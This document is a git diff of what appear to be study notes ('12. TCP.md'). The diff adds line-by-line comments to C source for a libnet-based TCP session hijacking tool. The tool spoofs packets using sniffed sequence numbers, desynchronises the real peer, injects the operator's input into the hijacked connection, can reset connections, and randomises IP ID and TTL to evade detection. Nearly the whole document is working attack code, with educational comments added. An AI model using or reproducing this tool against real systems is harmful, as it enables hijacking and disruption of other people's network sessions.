--- a/12. TCP.md
+++ b/12. TCP.md
@@ -218,25 +218,33 @@ struct seqack {
 	u_long          ack;
 };
 
+// __devsrandom__
+// input: void
+// outpu: void
+//
+// This function randomizes the random seed to make the random() function actually random.
 void devsrandom(void)
 {
 	int             fd;
 	u_long          seed;
 
+    // Read from the urandom and random files, they are files *in linux* that contain pseudo numbers generated
+    // from device drivers' noise.
 	fd = open("/dev/urandom", O_RDONLY);
 	if (fd == -1) {
 		fd = open("/dev/random", O_RDONLY);
-		if (fd == -1) {
+		if (fd == -1) {                         // If reading from the files failed then get the exact date & time to the second.
 			struct timeval  tv;
 
+            // Set the random seed as the result of a methematical operation using the current time and return.
 			gettimeofday(&tv, NULL);
 			srandom((tv.tv_sec ^ tv.tv_usec) * tv.tv_sec * tv.tv_usec ^ tv.tv_sec);
 			return;
 		}
 	}
-	read(fd, &seed, sizeof(seed));
+	read(fd, &seed, sizeof(seed));  // If reading from the files succeed, put the value in `seed` and close the file.
 	close(fd);
-	srandom(seed);
+	srandom(seed);                  // Set that number as the random seed.
 }
 
 // __getseqack__
@@ -312,36 +320,51 @@ void getseqack(char *interface, u_long srcip, u_long dstip, u_long sport, u_long
     }
 }
 
-
+// __sendtcp__
+// input:
+//  - src + dst ip & port
+//  - flags + seq + ack
+//  - data buffer
+//  - data bufer length
+// output: void
+//
+// This function sends the data in the given buffer to the destination address and port using the given source ip and port.
 void sendtcp(u_long srcip, u_long dstip, u_long sport, u_long dport, u_char flags, u_long seq, u_long ack, char *data, int datalen)
 {
-	u_char         *packet;
-	int             fd, psize;
+	u_char         *packet;                                                 // Buffer for packet.
+	int             fd, psize;                                              // variables for File Descriptor handle, Packet size.
 
-	devsrandom();
+	devsrandom();                                                           // Randomize raondom seed.
 	psize = LIBNET_IP_H + LIBNET_TCP_H + datalen;
-	libnet_init_packet(psize, &packet);
-	if (!packet)
+	libnet_init_packet(psize, &packet);                                     // Initialize packet buffer in the correct size.
+	if (!packet)                                                            // Error handling.
 		libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
-	fd = libnet_open_raw_sock(IPPROTO_RAW);
-	if (fd == -1)
+	fd = libnet_open_raw_sock(IPPROTO_RAW);                                 // Open new raw socket file descriptor. 
+	if (fd == -1)                                                           // Error handling.
 		libnet_error(LIBNET_ERR_FATAL, "libnet_open_raw_sock failed\n");
 
+    // Build the IP and TCP headers with the correct fields.
+    // IP header is given a random ID and TTL each new time, that is to make detection and identification more difficult.-
+    // - Different OS's use diffrent default TTL values.
 	libnet_build_ip(LIBNET_TCP_H + datalen, 0, random(), 0, lrandom(128, 255), IPPROTO_TCP, srcip, dstip, NULL, 0, packet);
 	libnet_build_tcp(sport, dport, seq, ack, flags, 65535, 0, (u_char *) data, datalen, packet + LIBNET_IP_H);
 
-	if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H + datalen) == -1)
-		libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
-	libnet_write_ip(fd, packet, psize);
-	libnet_close_raw_sock(fd);
-	libnet_destroy_packet(&packet);
+	if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H + datalen) == -1)  // Calculate and add the checksum value for the TCP header.
+		libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");          // Error handling.
+	libnet_write_ip(fd, packet, psize);                                         // Send the packet over the socket.
+	libnet_close_raw_sock(fd);                                                  // Close the socket.
+	libnet_destroy_packet(&packet);                                             // Free the packet buffer memory.
 }
 
 struct seqack   sa;                             // Global variable used to keep track of seq and ack numbers.
 u_long          srcip, dstip, sport, dport;     // global variables for source ip & port, destination ip & port.
 
-void
-sighandle(int sig)
+// __sighandle__
+// input:       int signal_code
+// output:      void
+//
+// This function calls the `sendtcp` function with the Reset flag to reset the connection.
+void sighandle(int sig)
 {
 	printf("Closing connection..\n");
 	sendtcp(srcip, dstip, sport, dport, TH_RST, sa.seq, 0, NULL, 0);
@@ -349,16 +372,15 @@ sighandle(int sig)
 	exit(0);
 }
 
-int
-main(int argc, char *argv[])
+int main(int argc, char *argv[])
 {
-	char           *ifa = argv[1];
-	char            buf[4096];
-	int		reset = 0;
-	signal(SIGTERM, sighandle);
-	signal(SIGINT, sighandle);
+	char *ifa = argv[1];            // A buffer for the interface name to use in the attack.
+	char buf[4096];                 // A buffer to keep user input.
+	int reset = 0;                  // This variable is used as a flag.
+	signal(SIGTERM, sighandle);     // Set the sighanle function has the handler for the termination signal.
+	signal(SIGINT, sighandle);      // Set the sighanle function has the handler for the interrupt signal.
 
-	if (argc < 6) {
+	if (argc < 6) {                 // Print help message and return with error code incase arguments are invalid.
 		printf("Usage: %s <interface> <src ip> <src port> <dst ip> <dst port> [-r]\n", argv[0]);
 		printf("<interface>\t\tThe interface you are going to hijack on.\n");
 		printf("<src ip>\t\tThe source ip of the connection.\n");
@@ -370,51 +392,64 @@ main(int argc, char *argv[])
 		exit(-1);
 	}
 
-if (argv[6] && !strcmp(argv[6], "-r") )
-	reset = 1;
+    if (argv[6] && !strcmp(argv[6], "-r") )                                     // Set the reset flag if the `-r` argument was given.
+        reset = 1;
 
-	srcip = inet_addr(argv[2]);
-	dstip = inet_addr(argv[4]);
-	sport = atol(argv[3]);
-	dport = atol(argv[5]);
+    srcip = inet_addr(argv[2]);                                                 // Put all arguments into buffers.
+    dstip = inet_addr(argv[4]);
+    sport = atol(argv[3]);
+    dport = atol(argv[5]);
 
-	if (!srcip) {
-		printf("%s is not a valid ip.\n", argv[2]);
-		exit(-1);
-	}
-	if (!dstip) {
-		printf("%s is not a valid ip.\n", argv[4]);
-		exit(-1);
-	}
-	if ((sport > 65535) || (dport > 65535) || (sport < 1) || (dport < 1)) {
-		printf("The valid TCP port range is 1-1024.\n");
-		exit(-1);
-	}
-	getseqack(ifa, srcip, dstip, sport, dport, &sa);
+    if (!srcip)
+    {                                                                           // Check validity of all arguments.
+        printf("%s is not a valid ip.\n", argv[2]);
+        exit(-1);
+    }
 
-if (reset) {
-	sendtcp(srcip, dstip, sport, dport, TH_RST, sa.seq, 0, NULL, 0);
-	printf("\nConnection has been reset.\n");
-	return 0;
-	}
+    if (!dstip)                                                                 // ..
+    {
+        printf("%s is not a valid ip.\n", argv[4]);
+        exit(-1);
+    }
+
+    if ((sport > 65535) || (dport > 65535) || (sport < 1) || (dport < 1))       // ..
+    {
+        printf("The valid TCP port range is 1-1024.\n");
+        exit(-1);
+    }
+
+    getseqack(ifa, srcip, dstip, sport, dport, &sa);                            // Get the seq and ack numbers of the connection to hijack.
+
+    if (reset)                                                                  // if the `reset` flag is set, simply send a RESET flag and do not hijack.
+    {
+        sendtcp(srcip, dstip, sport, dport, TH_RST, sa.seq, 0, NULL, 0);
+        printf("\nConnection has been reset.\n");
+        return 0;
+    }
 
 	/*
 	 * Sending 1024 of zero bytes so the real owner of the TCP connection
 	 * wont be able to get us out of sync with the SEQ.
 	 */
-	memset(&buf, 0, sizeof(buf));
+	memset(&buf, 0, sizeof(buf));                                                                   // Zero the input buffer.
+
+    // Hijack the connection + unsync the seq and ack number from the last ones the victim knows of.
 	sendtcp(srcip, dstip, sport, dport, TH_ACK | TH_PUSH, sa.seq, sa.ack, buf, 1024);
-	sa.seq += 1024;
+	sa.seq += 1024;                                                                                 // Update seq.
 
 	printf("Starting hijack session, Please use ^C to terminate.\n");
 	printf("Anything you enter from now on is sent to the hijacked TCP connection.\n");
 
-	while (fgets(buf, sizeof(buf) - 1, stdin)) {
-		sendtcp(srcip, dstip, sport, dport, TH_ACK | TH_PUSH, sa.seq, sa.ack, buf, strlen(buf));
-		sa.seq += strlen(buf);
-		memset(&buf, 0, sizeof(buf));
+
+    // While loop that keeps running as long as there is input.
+    // (Keep in mind that sighandle exits the program, that will also stop the loop.)
+	while (fgets(buf, sizeof(buf) - 1, stdin)) {                                                    // Read user input to `buf`.
+		sendtcp(srcip, dstip, sport, dport, TH_ACK | TH_PUSH, sa.seq, sa.ack, buf, strlen(buf));    // Send the input to the target over.
+		sa.seq += strlen(buf);                                                                      // Update seq.
+		memset(&buf, 0, sizeof(buf));                                                               // Zero `buf`.
 	}
-	sendtcp(srcip, dstip, sport, dport, TH_ACK | TH_FIN, sa.seq, sa.ack, NULL, 0);
+
+	sendtcp(srcip, dstip, sport, dport, TH_ACK | TH_FIN, sa.seq, sa.ack, NULL, 0);                  // Send FIN flag to close the connection.
 	printf("Exiting..\n");
 	return (0);
 }
